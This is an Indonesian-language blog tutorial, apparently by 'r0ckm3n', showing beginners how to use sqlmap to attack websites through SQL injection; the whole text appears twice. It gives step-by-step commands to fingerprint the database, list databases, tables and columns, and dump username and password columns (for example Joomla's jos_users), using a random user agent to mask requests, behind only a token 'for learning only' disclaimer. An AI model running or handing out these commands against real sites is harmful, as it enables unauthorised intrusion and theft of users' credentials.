SQL Injections dengan sqlmap ala newbie
Buat yang ga tau sqlmap, sqlmap software berbasis text untuk penetrasi lewat sql, biasanya disebut sql injection / sqli yang bisa di jalankan di windows/linux. Untuk di windows silahkan install dulu python nya.
oke sekarang kita mulai tutornya..
*WARNING :INI HANYA UNTUK PEMBELAJARAN, PENGGUNAAN ATAS TANGGUNG JAWAB SENDIRI
pertama jangan pengen instan bos,,,
misalnya dengan memasukan perintah langsung kaya gini:
./sqlmap.py -u "URL" --random-agent --threads X --banner --dbs --tables --columns --dump
jarang berhasil,.
mending ikutin scan target cara newbie, kita pecah perintah diatas jadi beberapa bagian:
1. fethcing banner <<untuk membuat route injection, dengan metode tebak-tebakan untuk menemukan dbms (database management system) contoh:mysql, oracle, etc.
perintah: ./sqlmap.py -u "URL" --random-agent --threads X --banner
2. fetching user <<analisis user yang ada pada dbms,injection akan lebih mudah karena telah terpetakan oleh perintah pertama
perintah: ./sqlmap.py -u "URL" --random-agent --threads X --current-user --current-db
3. fetching database <<untuk me list daftar database
perintah: ./sqlmap.py -u "URL" --random-agent --threads X --dbs
4. fetching table <<untuk mengetahui table yang ada pada database yang telah kita ketahui sebelumnya.
perintah: ./sqlmap.py -u "URL" --random-agent --threads X -D namadb --tables
seperti ini kira-kira tampilan table databasenya..
5. fetching kolom <<untuk mengetahui isi column dari table yang kita tentukan
perintah : ./sqlmap.py -u "URL" --random-agent --threads X -D namadb -T tab --columns
nah kalo yang ini tampilan column nya
6. terakhir fetching isi kolom << melihat isi data column nya :D
perintah: ./sqlmap.py -u "URL" --random-agent --threads X -D namadb -T tab -C username,password --dump
ket:
URL = web yang ada bug sqli contoh www.target.com/index.php?id=2
X = maksimum injection kalo ga salah ganti aja 10 misalnya
namadb = nama database yang ingin di ketahui
tab = tabel yang ingin kita buka misal jos_users untuk joomla (tergantung dari database)
username,password = tergantung dari table yang kita dapat
untuk melihat hasil dumpnya, buka folder sqlmqp - output - www.target.com - dump
oke, sekian dulu deh :)
r0ckm3n
oke sekarang kita mulai tutornya..
*WARNING :INI HANYA UNTUK PEMBELAJARAN, PENGGUNAAN ATAS TANGGUNG JAWAB SENDIRI
pertama jangan pengen instan bos,,,
misalnya dengan memasukan perintah langsung kaya gini:
./sqlmap.py -u "URL" --random-agent --threads X --banner --dbs --tables --columns --dump
jarang berhasil,.
mending ikutin scan target cara newbie, kita pecah perintah diatas jadi beberapa bagian:
1. fethcing banner <<untuk membuat route injection, dengan metode tebak-tebakan untuk menemukan dbms (database management system) contoh:mysql, oracle, etc.
perintah: ./sqlmap.py -u "URL" --random-agent --threads X --banner
2. fetching user <<analisis user yang ada pada dbms,injection akan lebih mudah karena telah terpetakan oleh perintah pertama
perintah: ./sqlmap.py -u "URL" --random-agent --threads X --current-user --current-db
3. fetching database <<untuk me list daftar database
perintah: ./sqlmap.py -u "URL" --random-agent --threads X --dbs
4. fetching table <<untuk mengetahui table yang ada pada database yang telah kita ketahui sebelumnya.
perintah: ./sqlmap.py -u "URL" --random-agent --threads X -D namadb --tables
seperti ini kira-kira tampilan table databasenya..
5. fetching kolom <<untuk mengetahui isi column dari table yang kita tentukan
perintah : ./sqlmap.py -u "URL" --random-agent --threads X -D namadb -T tab --columns
nah kalo yang ini tampilan column nya
6. terakhir fetching isi kolom << melihat isi data column nya :D
perintah: ./sqlmap.py -u "URL" --random-agent --threads X -D namadb -T tab -C username,password --dump
ket:
URL = web yang ada bug sqli contoh www.target.com/index.php?id=2
X = maksimum injection kalo ga salah ganti aja 10 misalnya
namadb = nama database yang ingin di ketahui
tab = tabel yang ingin kita buka misal jos_users untuk joomla (tergantung dari database)
username,password = tergantung dari table yang kita dapat
untuk melihat hasil dumpnya, buka folder sqlmqp - output - www.target.com - dump
oke, sekian dulu deh :)
r0ckm3n
0 comments:
Post a Comment